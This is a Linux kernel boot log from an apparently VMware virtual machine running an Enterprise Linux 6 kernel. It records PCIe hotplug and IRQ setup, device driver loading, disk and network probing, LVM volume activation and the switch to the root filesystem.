pcieport 0000:00:15.5: irq 29 for MSI/MSI-X
pcieport 0000:00:15.6: setting latency timer to 64
  alloc irq_desc for 30 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:15.6: irq 30 for MSI/MSI-X
pcieport 0000:00:15.7: setting latency timer to 64
  alloc irq_desc for 31 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:15.7: irq 31 for MSI/MSI-X
pcieport 0000:00:16.0: setting latency timer to 64
  alloc irq_desc for 32 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.0: irq 32 for MSI/MSI-X
pcieport 0000:00:16.1: setting latency timer to 64
  alloc irq_desc for 33 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.1: irq 33 for MSI/MSI-X
pcieport 0000:00:16.2: setting latency timer to 64
  alloc irq_desc for 34 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.2: irq 34 for MSI/MSI-X
pcieport 0000:00:16.3: setting latency timer to 64
  alloc irq_desc for 35 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.3: irq 35 for MSI/MSI-X
pcieport 0000:00:16.4: setting latency timer to 64
  alloc irq_desc for 36 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.4: irq 36 for MSI/MSI-X
pcieport 0000:00:16.5: setting latency timer to 64
  alloc irq_desc for 37 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.5: irq 37 for MSI/MSI-X
pcieport 0000:00:16.6: setting latency timer to 64
  alloc irq_desc for 38 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.6: irq 38 for MSI/MSI-X
pcieport 0000:00:16.7: setting latency timer to 64
  alloc irq_desc for 39 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:16.7: irq 39 for MSI/MSI-X
pcieport 0000:00:17.0: setting latency timer to 64
  alloc irq_desc for 40 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.0: irq 40 for MSI/MSI-X
pcieport 0000:00:17.1: setting latency timer to 64
  alloc irq_desc for 41 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.1: irq 41 for MSI/MSI-X
pcieport 0000:00:17.2: setting latency timer to 64
  alloc irq_desc for 42 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.2: irq 42 for MSI/MSI-X
pcieport 0000:00:17.3: setting latency timer to 64
  alloc irq_desc for 43 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.3: irq 43 for MSI/MSI-X
pcieport 0000:00:17.4: setting latency timer to 64
  alloc irq_desc for 44 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.4: irq 44 for MSI/MSI-X
pcieport 0000:00:17.5: setting latency timer to 64
  alloc irq_desc for 45 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.5: irq 45 for MSI/MSI-X
pcieport 0000:00:17.6: setting latency timer to 64
  alloc irq_desc for 46 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.6: irq 46 for MSI/MSI-X
pcieport 0000:00:17.7: setting latency timer to 64
  alloc irq_desc for 47 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:17.7: irq 47 for MSI/MSI-X
pcieport 0000:00:18.0: setting latency timer to 64
  alloc irq_desc for 48 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.0: irq 48 for MSI/MSI-X
pcieport 0000:00:18.1: setting latency timer to 64
  alloc irq_desc for 49 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.1: irq 49 for MSI/MSI-X
pcieport 0000:00:18.2: setting latency timer to 64
  alloc irq_desc for 50 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.2: irq 50 for MSI/MSI-X
pcieport 0000:00:18.3: setting latency timer to 64
  alloc irq_desc for 51 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.3: irq 51 for MSI/MSI-X
pcieport 0000:00:18.4: setting latency timer to 64
  alloc irq_desc for 52 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.4: irq 52 for MSI/MSI-X
pcieport 0000:00:18.5: setting latency timer to 64
  alloc irq_desc for 53 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.5: irq 53 for MSI/MSI-X
pcieport 0000:00:18.6: setting latency timer to 64
  alloc irq_desc for 54 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.6: irq 54 for MSI/MSI-X
pcieport 0000:00:18.7: setting latency timer to 64
  alloc irq_desc for 55 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:18.7: irq 55 for MSI/MSI-X
pci_hotplug: PCI Hot Plug PCI Core version: 0.5
pciehp 0000:00:15.0:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.0:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:15.1:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.1:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:15.2:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.2:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:15.3:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.3:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:15.4:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.4:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:15.5:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.5:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:15.6:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.6:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:15.7:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:15.7:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:16.0:pcie7d4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.0:pcie7d4: service driver pciehp loaded
pciehp 0000:00:16.1:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.1:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:16.2:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.2:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:16.3:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.3:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:16.4:pcie7d4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.4:pcie7d4: service driver pciehp loaded
pciehp 0000:00:16.5:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.5:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:16.6:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.6:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:16.7:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:16.7:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:17.0:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.0:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:17.1:pciec4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.1:pciec4: service driver pciehp loaded
pciehp 0000:00:17.2:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.2:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:17.3:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.3:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:17.4:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.4:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:17.5:pciea44: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.5:pciea44: service driver pciehp loaded
pciehp 0000:00:17.6:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.6:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:17.7:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:17.7:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:18.0:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.0:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:18.1:pcie5a4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.1:pcie5a4: service driver pciehp loaded
pciehp 0000:00:18.2:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.2:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:18.3:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.3:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:18.4:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.4:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:18.5:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.5:pcie04: service driver pciehp loaded
pciehp 0000:00:18.6:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.6:pcieffffffc4: service driver pciehp loaded
pciehp 0000:00:18.7:pcieffffffc4: HPC vendor_id 15ad device_id 7a0 ss_vid 0 ss_did 0
pciehp 0000:00:18.7:pcieffffffc4: service driver pciehp loaded
pciehp: PCI Express Hot Plug Controller Driver version: 0.4
acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5
acpiphp: Slot [32] registered
acpiphp: Slot [33] registered
acpiphp: Slot [34] registered
acpiphp: Slot [35] registered
acpiphp: Slot [36] registered
acpiphp: Slot [37] registered
acpiphp: Slot [38] registered
acpiphp: Slot [39] registered
acpiphp: Slot [40] registered
acpiphp: Slot [41] registered
acpiphp: Slot [42] registered
acpiphp: Slot [43] registered
acpiphp: Slot [44] registered
acpiphp: Slot [45] registered
acpiphp: Slot [46] registered
acpiphp: Slot [47] registered
acpiphp: Slot [48] registered
acpiphp: Slot [49] registered
acpiphp: Slot [50] registered
acpiphp: Slot [51] registered
acpiphp: Slot [52] registered
acpiphp: Slot [53] registered
acpiphp: Slot [54] registered
acpiphp: Slot [55] registered
acpiphp: Slot [56] registered
acpiphp: Slot [57] registered
acpiphp: Slot [58] registered
acpiphp: Slot [59] registered
acpiphp: Slot [60] registered
acpiphp: Slot [61] registered
acpiphp: Slot [62] registered
acpiphp: Slot [63] registered
acpiphp_glue: Slot 160 already registered by another hotplug driver
acpiphp_glue: Slot 192 already registered by another hotplug driver
acpiphp_glue: Slot 224 already registered by another hotplug driver
acpiphp_glue: Slot 256 already registered by another hotplug driver
acpiphp_glue: Slot 161 already registered by another hotplug driver
acpiphp_glue: Slot 162 already registered by another hotplug driver
acpiphp_glue: Slot 163 already registered by another hotplug driver
acpiphp_glue: Slot 164 already registered by another hotplug driver
acpiphp_glue: Slot 165 already registered by another hotplug driver
acpiphp_glue: Slot 166 already registered by another hotplug driver
acpiphp_glue: Slot 167 already registered by another hotplug driver
acpiphp_glue: Slot 193 already registered by another hotplug driver
acpiphp_glue: Slot 194 already registered by another hotplug driver
acpiphp_glue: Slot 195 already registered by another hotplug driver
acpiphp_glue: Slot 196 already registered by another hotplug driver
acpiphp_glue: Slot 197 already registered by another hotplug driver
acpiphp_glue: Slot 198 already registered by another hotplug driver
acpiphp_glue: Slot 199 already registered by another hotplug driver
acpiphp_glue: Slot 225 already registered by another hotplug driver
acpiphp_glue: Slot 226 already registered by another hotplug driver
acpiphp_glue: Slot 227 already registered by another hotplug driver
acpiphp_glue: Slot 228 already registered by another hotplug driver
acpiphp_glue: Slot 229 already registered by another hotplug driver
acpiphp_glue: Slot 230 already registered by another hotplug driver
acpiphp_glue: Slot 231 already registered by another hotplug driver
acpiphp_glue: Slot 257 already registered by another hotplug driver
acpiphp_glue: Slot 258 already registered by another hotplug driver
acpiphp_glue: Slot 259 already registered by another hotplug driver
acpiphp_glue: Slot 260 already registered by another hotplug driver
acpiphp_glue: Slot 261 already registered by another hotplug driver
acpiphp_glue: Slot 262 already registered by another hotplug driver
acpiphp_glue: Slot 263 already registered by another hotplug driver
ACPI: AC Adapter [ACAD] (on-line)
input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0
ACPI: Power Button [PWRF]
ACPI: acpi_idle registered with cpuidle
processor LNXCPU:00: registered as cooling_device0
processor LNXCPU:01: registered as cooling_device1
processor LNXCPU:02: registered as cooling_device2
processor LNXCPU:03: registered as cooling_device3
processor LNXCPU:04: registered as cooling_device4
processor LNXCPU:05: registered as cooling_device5
processor LNXCPU:06: registered as cooling_device6
processor LNXCPU:07: registered as cooling_device7
processor LNXCPU:08: registered as cooling_device8
processor LNXCPU:09: registered as cooling_device9
processor LNXCPU:0a: registered as cooling_device10
processor LNXCPU:0b: registered as cooling_device11
processor LNXCPU:0c: registered as cooling_device12
processor LNXCPU:0d: registered as cooling_device13
processor LNXCPU:0e: registered as cooling_device14
processor LNXCPU:0f: registered as cooling_device15
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
Hotplug Mem Device 
ERST: Table is not found!
GHES: HEST is not enabled!
Non-volatile memory driver v1.3
Linux agpgart interface v0.103
agpgart-intel 0000:00:00.0: Intel 440BX Chipset
agpgart-intel 0000:00:00.0: AGP aperture is 256M @ 0x0
crash memory driver: version 1.1
Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
00:0b: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
brd: module loaded
loop: module loaded
input: Macintosh mouse button emulation as /devices/virtual/input/input1
Fixed MDIO Bus: probed
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
uhci_hcd: USB Universal Host Controller Interface driver
PNP: PS/2 Controller [PNP0303:KBC,PNP0f13:MOUS] at 0x60,0x64 irq 1,12
serio: i8042 KBD port at 0x60,0x64 irq 1
serio: i8042 AUX port at 0x60,0x64 irq 12
mice: PS/2 mouse device common for all mice
rtc_cmos 00:04: rtc core: registered rtc_cmos as rtc0
rtc0: alarms up to one month, y3k, 114 bytes nvram, hpet irqs
cpuidle: using governor ladder
cpuidle: using governor menu
usbcore: registered new interface driver hiddev
usbcore: registered new interface driver usbhid
usbhid: v2.6:USB HID core driver
TCP cubic registered
Initializing XFRM netlink socket
NET: Registered protocol family 17
registered taskstats version 1
input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2
input: ImPS/2 Generic Wheel Mouse as /devices/platform/i8042/serio1/input/input3
rtc_cmos 00:04: setting system clock to 2017-02-17 00:10:46 UTC (1487290246)
Initalizing network drop monitor service
Freeing unused kernel memory: 1244k freed
Write protecting the kernel read-only data: 10240k
Freeing unused kernel memory: 1040k freed
Freeing unused kernel memory: 1760k freed
dracut: dracut-004-256.el6
dracut: rd_NO_LUKS: removing cryptoluks activation
device-mapper: uevent: version 1.0.3
device-mapper: ioctl: 4.22.6-ioctl (2011-10-19) initialised: dm-devel@redhat.com
udev: starting version 147
dracut: Starting plymouth daemon
dracut: rd_NO_DM: removing DM RAID activation
dracut: rd_NO_MD: removing MD RAID activation
ata_piix 0000:00:07.1: version 2.13
scsi0 : ata_piix
scsi1 : ata_piix
ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0x1060 irq 14
ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0x1068 irq 15
ata2.00: ATAPI: VMware Virtual IDE CDROM Drive, 00000001, max UDMA/33
ata2.00: configured for UDMA/33
scsi 1:0:0:0: CD-ROM            NECVMWar VMware IDE CDR10 1.00 PQ: 0 ANSI: 5
VMware PVSCSI driver - version 1.0.1.0-k
  alloc irq_desc for 18 on node -1
  alloc kstat_irqs on node -1
vmw_pvscsi 0000:03:00.0: PCI INT A -> GSI 18 (level, low) -> IRQ 18
vmw_pvscsi: using 64bit dma
vmw_pvscsi 0000:03:00.0: setting latency timer to 64
  alloc irq_desc for 56 on node -1
  alloc kstat_irqs on node -1
vmw_pvscsi 0000:03:00.0: irq 56 for MSI/MSI-X
vmw_pvscsi: using MSI-X
scsi2 : VMware PVSCSI storage adapter rev 2, req/cmp/msg rings: 8/8/1 pages, cmd_per_lun=64
vmw_pvscsi 0000:03:00.0: VMware PVSCSI rev 2 host #2
scsi 2:0:0:0: Direct-Access     VMware   Virtual disk     1.0  PQ: 0 ANSI: 2
scsi 2:0:1:0: Direct-Access     VMware   Virtual disk     1.0  PQ: 0 ANSI: 2
VMware vmxnet3 virtual NIC driver - version 1.1.18.0-k-NAPI
# of Tx queues : 8, # of Rx queues : 8
  alloc irq_desc for 19 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: PCI INT A -> GSI 19 (level, low) -> IRQ 19
vmxnet3 0000:0b:00.0: setting latency timer to 64
vmxnet3 0000:0b:00.0: (unregistered net_device): features: sg csum vlan jf tso tsoIPv6 lro highDMA
  alloc irq_desc for 57 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 57 for MSI/MSI-X
  alloc irq_desc for 58 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 58 for MSI/MSI-X
  alloc irq_desc for 59 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 59 for MSI/MSI-X
  alloc irq_desc for 60 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 60 for MSI/MSI-X
  alloc irq_desc for 61 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 61 for MSI/MSI-X
  alloc irq_desc for 62 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 62 for MSI/MSI-X
  alloc irq_desc for 63 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 63 for MSI/MSI-X
  alloc irq_desc for 64 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 64 for MSI/MSI-X
  alloc irq_desc for 65 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:0b:00.0: irq 65 for MSI/MSI-X
RSS is enabled.
eth0: NIC Link is Up 10000 Mbps
# of Tx queues : 8, # of Rx queues : 8
  alloc irq_desc for 16 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: PCI INT A -> GSI 16 (level, low) -> IRQ 16
vmxnet3 0000:13:00.0: setting latency timer to 64
vmxnet3 0000:13:00.0: (unregistered net_device): features: sg csum vlan jf tso tsoIPv6 lro highDMA
  alloc irq_desc for 66 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 66 for MSI/MSI-X
  alloc irq_desc for 67 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 67 for MSI/MSI-X
  alloc irq_desc for 68 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 68 for MSI/MSI-X
  alloc irq_desc for 69 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 69 for MSI/MSI-X
  alloc irq_desc for 70 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 70 for MSI/MSI-X
  alloc irq_desc for 71 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 71 for MSI/MSI-X
  alloc irq_desc for 72 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 72 for MSI/MSI-X
  alloc irq_desc for 73 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 73 for MSI/MSI-X
  alloc irq_desc for 74 on node -1
  alloc kstat_irqs on node -1
vmxnet3 0000:13:00.0: irq 74 for MSI/MSI-X
RSS is enabled.
eth1: NIC Link is Up 10000 Mbps
sr0: scsi3-mmc drive: 1x/1x writer dvd-ram cd/rw xa/form2 cdda tray
Uniform CD-ROM driver Revision: 3.20
sr 1:0:0:0: Attached scsi CD-ROM sr0
sd 2:0:0:0: [sda] 83886080 512-byte logical blocks: (42.9 GB/40.0 GiB)
sd 2:0:0:0: [sda] Write Protect is off
sd 2:0:0:0: [sda] Mode Sense: 61 00 00 00
sd 2:0:1:0: [sdb] 146800640 512-byte logical blocks: (75.1 GB/70.0 GiB)
sd 2:0:0:0: [sda] Cache data unavailable
sd 2:0:0:0: [sda] Assuming drive cache: write through
sd 2:0:1:0: [sdb] Write Protect is off
sd 2:0:1:0: [sdb] Mode Sense: 61 00 00 00
sd 2:0:1:0: [sdb] Cache data unavailable
sd 2:0:1:0: [sdb] Assuming drive cache: write through
sd 2:0:1:0: [sdb] Cache data unavailable
sd 2:0:1:0: [sdb] Assuming drive cache: write through
 sdb:
sd 2:0:0:0: [sda] Cache data unavailable
sd 2:0:0:0: [sda] Assuming drive cache: write through
 sda: sda1 sda2
 unknown partition table
sd 2:0:1:0: [sdb] Cache data unavailable
sd 2:0:1:0: [sdb] Assuming drive cache: write through
sd 2:0:1:0: [sdb] Attached SCSI disk
sd 2:0:0:0: [sda] Cache data unavailable
sd 2:0:0:0: [sda] Assuming drive cache: write through
sd 2:0:0:0: [sda] Attached SCSI disk
dracut: Scanning devices sda2 sdb  for LVM logical volumes rootvg/rootlv rootvg/swaplv 
dracut: inactive '/dev/appvg/applv' [15.00 GiB] inherit
dracut: inactive '/dev/appvg/dynalv' [512.00 MiB] inherit
dracut: inactive '/dev/appvg/ibmlv' [25.00 GiB] inherit
dracut: inactive '/dev/appvg/splunklv' [2.00 GiB] inherit
dracut: inactive '/dev/appvg/docslv' [20.00 GiB] inherit
dracut: inactive '/dev/rootvg/rootlv' [2.00 GiB] inherit
dracut: inactive '/dev/rootvg/optlv' [4.00 GiB] inherit
dracut: inactive '/dev/rootvg/tmplv' [4.00 GiB] inherit
dracut: inactive '/dev/rootvg/usrlv' [4.00 GiB] inherit
dracut: inactive '/dev/rootvg/varlv' [4.00 GiB] inherit
dracut: inactive '/dev/rootvg/swaplv' [8.00 GiB] inherit
dracut: inactive '/dev/rootvg/homelv' [4.00 GiB] inherit
EXT4-fs (dm-0): mounted filesystem with ordered data mode. Opts: 
dracut: Mounted root filesystem /dev/mapper/rootvg-rootlv
SELinux:  Disabled at runtime.
SELinux:  Unregistering netfilter hooks
type=1404 audit(1487290247.896:2): selinux=0 auid=4294967295 ses=4294967295
dracut: 
dracut: Switching root
readahead-collector: starting
udev: starting version 147
